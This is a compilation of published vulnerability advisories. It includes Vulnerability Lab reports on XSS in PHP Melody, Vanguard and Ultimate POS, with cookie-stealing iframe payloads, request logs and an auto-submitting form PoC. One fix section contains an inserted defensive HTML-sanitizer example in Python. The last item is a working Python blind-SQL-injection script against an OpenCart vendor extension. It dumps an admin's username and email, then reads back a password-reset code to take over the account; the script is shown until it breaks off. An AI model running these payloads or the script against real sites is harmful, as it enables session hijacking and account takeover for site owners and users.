<input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id">
</div>


--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
# Date: 2021-10-21
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html

Document Title:
===============
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2291

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/


Release Date:
=============
2021-10-21


Vulnerability Laboratory ID (VL-ID):
====================================
2291


Common Vulnerability Scoring System:
====================================
5.4


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )



Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application.


Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector,
compromising browser-to-web-application requests from the application side.

The persistent cross site web vulnerability is located in the video editor (WYSIWYG) using the tinymce class.
Privileged user accounts such as editors are able to inject their own malicious script code via the editor to provoke
execution in the browsers of other users or administrators. The request method to inject is get, and once the content
is saved to the dbms via a post request the attack vector becomes persistent.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Editor - Videos (WYSIWYG - tinymce)

Vulnerable File(s):
[+] edit-episode.php

Vulnerable Parameter(s):
[+] episode_id

Affected Module(s):
[+] description


Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by remote attackers with a privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

PoC: Payload
<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">"
href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p>


--- PoC Session Logs (GET) [WYSIWYG] ---
https://phpmelody.localhost.com:8080/admin/[PWND]
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin;
melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html;
vary: Accept-Encoding


Vulnerable Source: Video Editor (WYSIWYG - tinymce)
<textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;"
aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">"
  href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea>
<span class="autosave-message"></span>
</div></div>


Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/edit-episode.php
https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1


Solution - Fix & Patch:
=======================
Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks.


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.

				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
            
# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
# Version: 2.1

Document Title:
===============
Vanguard v2.1 - (Search) POST Inject Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2283


Release Date:
=============
2021-10-26


Vulnerability Laboratory ID (VL-ID):
====================================
2283


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application.


Affected Product(s):
====================
VanguardInfini
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)



Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application.
The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user
session data or to manipulate application contents for clients.

The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post
injection web vulnerability with non-persistent attack vector.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of affected application modules.

Request method(s):
[+] POST

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] phps_query


Proof of Concept (PoC):
=======================
The client-side post inject web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.


Vulnerable Source: search
<div class="ui yellow basic segment"></div>
<div class="ui container" style="margin-top: -0.7em;">
<form method="POST" action="https://vanguard.squamifer.ovh/search">
<div class="ui action input fluid">
<input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product...">
<button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form>
<div class="ui divider"></div>
<div class="ui cards aligned centered">
<div class="alert color blue-color"><div class="ui hidden divider"></div>
<div class="ui icon info message"><i class="help circle icon"></i><div class="content">
<div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div>
</div></div></div>


--- PoC Session Logs [POST] ---
https://vanguard.localhost:8080/search
Host: vanguard.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: https://vanguard.localhost:8080
Connection: keep-alive
Referer: https://vanguard.localhost:8080/
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;)
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
pragma: no-cache
cache-control: private
vary: Accept-Encoding


Exploitation: PoC
<html>
<head>
<title>PoC</title>
<style type="text/css">
#nodisplay {
display:none;
}
</style>
</head>
<body>
<div id="nodisplay">
<form action="https://vanguard.localhost:8080/search" method="post">
<input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/>
</form>
</div>
<script>
function submitForm() {
document.forms[0].submit();
}
submitForm();
</script>
</body>
</html>


Security Risk:
==============
The security risk of the validation web vulnerability in the web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


            
# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/
# Version: 4.4


Document Title:
===============
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2296


Release Date:
=============
2021-10-26


Vulnerability Laboratory ID (VL-ID):
====================================
2296


Common Vulnerability Scoring System:
====================================
5.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
The Ultimate POS is an ERP, stock management, point of sale & invoicing web-application.
The application uses a MySQL database management system in combination with PHP 7.2.

(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )



Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the Ultimate POS v4.4 erp stock management web-application.


Affected Product(s):
====================
thewebfosters
Ultimate POS v4.4 - ERP (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent cross site web vulnerability has been discovered in the Ultimate POS v4.4 erp stock management web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector,
compromising browser-to-web-application requests from the application side.

The persistent validation web vulnerability is located in the name parameter of the add products module.
Remote attackers with vendor privileges to add products are able to inject their own malicious script code.
The request method to inject is post and the attack vector is persistent. Injection is possible when editing
or creating a product.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks,
persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Products (Add)

Vulnerable Input(s):
[+] Product Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] Products List


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with a privileged application account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.


PoC: Payload
test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>
test"><img src="evil.source" onload=alert(document.cookie)></img>


--- PoC Session Logs (POST) [Add] ---
https://pos-uf.localhost.com:8000/products
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599
Content-Length: 3931
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/create
Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV
nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
_token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id=
&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000
set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb
khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly


--- PoC Session Logs (POST) [Edit] ---
https://pos-uf.localhost.com:8000/products/23
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867
Content-Length: 4064
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/23/edit
Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D
_method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2
&woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00
&profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000/products
set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdF
Q2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmN
mIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly


Vulnerable Source: Products (list - name)
<tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td">
<input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td>
<td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false">
Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li>
<a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode">
</i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li>
<li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li>
<a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider">
</li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database">
</i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history">
</i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy">
</i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>
<br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00  </div></td><td>
<div style="white-space: nowrap;">$ 1.25  </div></td><td> 0  Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td>
<td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even">
<td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td>


Reference(s):
https://pos-uf.localhost.com:8000/products/
https://pos-uf.localhost.com:8000/products/view/
https://pos-uf.localhost.com:8000/products/23/edit


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Restrict the input on product names to disallow special chars
2. Encode and filter the input transmitted via post in the name parameter
3. Escape and sanitize the output in the products listing of the backend
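The fix advice in the PHP Melody (tinymce description), Vanguard (search phps_query) and Ultimate POS (product name) advisories above comes down to two different output-handling rules, shown here as an added example in Python that is not code from any of the three products: a plain-text field is HTML-encoded on output, while a WYSIWYG description, which has to keep its markup, is rebuilt through an allowlist sanitizer that drops iframe, event-handler attributes and unsafe href schemes. The allowlisted tag and attribute sets are assumptions made for this example; the sample inputs are the payloads quoted in the advisories plus one constructed description.

```python
"""Output handling for the XSS classes in the advisories above (added example)."""
import html
from html.parser import HTMLParser

# Rich-text (WYSIWYG) allowlist. Assumption for this example: descriptions only
# need basic formatting and links; anything else is dropped with its attributes.
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}   # never style= or on*= handlers
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


def escape_plain(value: str) -> str:
    """Plain-text fields (search term, product name): encode on output.
    quote=True also encodes " and ', so the value cannot break out of an
    attribute such as value="..." in the search form."""
    return html.escape(value, quote=True)


def safe_href(url: str) -> bool:
    """Allow site-relative paths and a few schemes; reject javascript:, data:
    and scheme-relative //host URLs (the form used in the PHP Melody payload)."""
    u = url.strip().lower()
    if u.startswith("/") and not u.startswith("//"):
        return True
    return u.startswith(SAFE_SCHEMES)


class AllowlistSanitizer(HTMLParser):
    """Rebuild the document from parsed tokens, keeping only allowlisted tags
    and attributes. Text nodes are re-escaped, so a stray '">' in the input
    becomes inert text instead of closing or opening an element."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # stack of kept tags, to emit matching closers

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return   # drops <iframe>, <img>, <script>, ... with all attributes
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue   # drops onload=, onerror=, style=, ...
            if name == "href" and not safe_href(value or ""):
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return   # closer for a dropped or never-opened tag: ignore it
        while self.open_tags:   # close nested kept tags so output stays well-formed
            t = self.open_tags.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        # Also covers the body of a dropped <script>/<style> element, which the
        # parser hands over as raw text: it ends up escaped, never executed.
        self.out.append(html.escape(data, quote=True))

    def result(self) -> str:
        self.close()
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_rich_html(value: str) -> str:
    """WYSIWYG fields (video description): keep markup, drop everything unsafe."""
    s = AllowlistSanitizer()
    s.feed(value)
    return s.result()


# Sample inputs: the payloads quoted in the advisories above, plus one
# constructed rich-text description mixing wanted and unwanted markup.
VANGUARD_SEARCH = '"><iframe src=a onload=alert(document.cookie)>'
ULTIMATE_POS_NAME = 'test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>'
MELODY_DESCRIPTION = ('<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">"\n'
                      'href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source '
                      'onload=alert(document.cookie)>">">">">"></iframe></a></p>')
CONSTRUCTED_RICH = ('<p>Episode <b>one</b> <a href="javascript:alert(1)" onclick="x()">link</a>'
                    '<iframe src=evil.source onload=alert(1)></iframe></p>')

if __name__ == "__main__":
    print(escape_plain(VANGUARD_SEARCH))
    print(escape_plain(ULTIMATE_POS_NAME))
    print(sanitize_rich_html(MELODY_DESCRIPTION))
    print(sanitize_rich_html(CONSTRUCTED_RICH))
```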


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


            
# Exploit Title: Opencart 3 Extension TMD Vendor System - Blind SQL Injection
# Author: Muhammad Zaki Sulistya (zaki.sulistya@gmail.com)
# Date: 03-11-2021
# Product: TMD Vendor System
# Vendor Homepage: https://www.opencartextensions.in/
# Software Link: https://www.opencartextensions.in/opencart-multi-vendor-multi-seller-marketplace
# Version: TMD Vendor System 3.x
# Tested on: MacOS
# Google Dork: inurl:index.php?route=vendor/allseller
# Info: Patched on the new version

#!/usr/bin/env python3
# The script uses print() as a function and input() for the target, so it is
# Python 3 code; the shebang is adjusted to match.
import requests
from bs4 import BeautifulSoup
from random import randint
import time

class TmdSqli:
    def __init__(self, url):
        # Alphabet tried for every character position during the blind dump
        self.char_list = ['.',':', '@', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
        self.url = url
        self.user_agents = []
        # Filled in once the boolean oracle is confirmed (is_vulnerable) and
        # the first row has been dumped (dump_data)
        self.injection_true = None
        self.username = None
        self.email = None
        self.set_user_agent()
        self.is_vulnerable()

    def set_user_agent(self):
        # Fetch a public user-agent list so each request carries a random UA
        if len(self.user_agents) == 0:
            r = requests.get(
                'https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt').text
            self.user_agents = [ua for ua in r.split("\n") if ua]

    def get_content(self, url):
        # Return the page's #content element; the boolean oracle compares this
        # element between the baseline, the TRUE and the FALSE injected request
        try:
            n = randint(0, len(self.user_agents) - 1)  # index within the list
            headers = {'user-agent': self.user_agents[n]}
            req = requests.get(url, headers=headers)
            soup = BeautifulSoup(req.content, 'html.parser')
            return soup.find(id='content')
        except requests.exceptions.ConnectionError as e:
            print("CONNECTION ERROR:", e)
            time.sleep(60)
            return self.get_content(url)  # retry; the original dropped the result

    def is_vulnerable(self):
        # Baseline == TRUE condition and baseline != FALSE condition means the
        # injected condition controls the page: a boolean-based blind oracle
        url_injection_true = self.url + "' AND 1=1--+-"
        url_injection_false = self.url + "' AND 1=0--+-"

        default_response = self.get_content(self.url)
        injection_true = self.get_content(url_injection_true)
        injection_false = self.get_content(url_injection_false)

        if (default_response == injection_true) and (default_response != injection_false):
            print("The target is vulnerable")
            self.injection_true = injection_true
            row_length = self.user_data_length()
            self.dump_data(row_length)
        else:
            print("Not vulnerable")

    def user_data_length(self):
        # Count upwards until the oracle confirms LENGTH(username:email)
        n = 1
        while True:
            request_url = self.url + "' AND (SELECT LENGTH(CONCAT(username,0x3a,email)) FROM oc_user LIMIT 0,1)=" + str(n) + "--+-"
            req = self.get_content(request_url)
            if req != self.injection_true:
                n += 1
            else:
                print("Row length : " + str(n))
                return n

    def reset_code_length(self):
        # Same counting loop for the length of the user's reset code
        n = 1
        while True:
            request_url = self.url + "' AND (SELECT LENGTH(CONCAT(code)) FROM oc_user WHERE username = '" + self.username + "')=" + str(
                n) + "--+-"
            req = self.get_content(request_url)
            if req != self.injection_true:
                n += 1
            else:
                print("Row length : " + str(n))
                return n

    def dump_data(self, length):
        # Recover username:email one character position at a time
        data = ""
        for i in range(1, length + 1):
            for j in self.char_list:
                j = ord(j)
                request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(username,0x3a,email), " + str(i) + ",1)) FROM oc_user LIMIT 0,1)=" + str(j) + "--+-"
                req = self.get_content(request_url)
                if req == self.injection_true:
                    data += chr(j)
                    print("Get : " + data)
                    break  # position resolved; the original kept trying the rest of the alphabet
        user_data = data.split(":")
        self.username = user_data[0]
        self.email = user_data[1]
        self.reset_password()

    def dump_reset_code(self, length):
        # Same per-character loop for the reset code of the dumped user
        data = ""
        for i in range(1, length + 1):
            for j in self.char_list:
                j = ord(j)
                request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(code), " + str(
                    i) + ",1)) FROM oc_user WHERE username = '" + self.username + "')=" + str(j) + "--+-"
                req = self.get_content(request_url)
                if req == self.injection_true:
                    data += chr(j)
                    print("Get : " + data)
                    break
        return data

    def reset_password(self):
        # Request a password reset for the dumped e-mail address, then read
        # the stored reset code back through the same oracle
        self.admin_page = input("Admin page URL : ")
        request_url = self.admin_page + '/index.php?route=common/forgotten'
        post_data = {'email':self.email}
        req = requests.post(request_url, data=post_data)
        if req.status_code == 200:
            row_length = self.reset_code_length()
            reset_code = self.dump_reset_code(row_length)
            reset_password_url = self.admin_page + '/index.php?route=common/reset&code=' + reset_code
            print("Gotcha!")
            print("username : " + self.username)
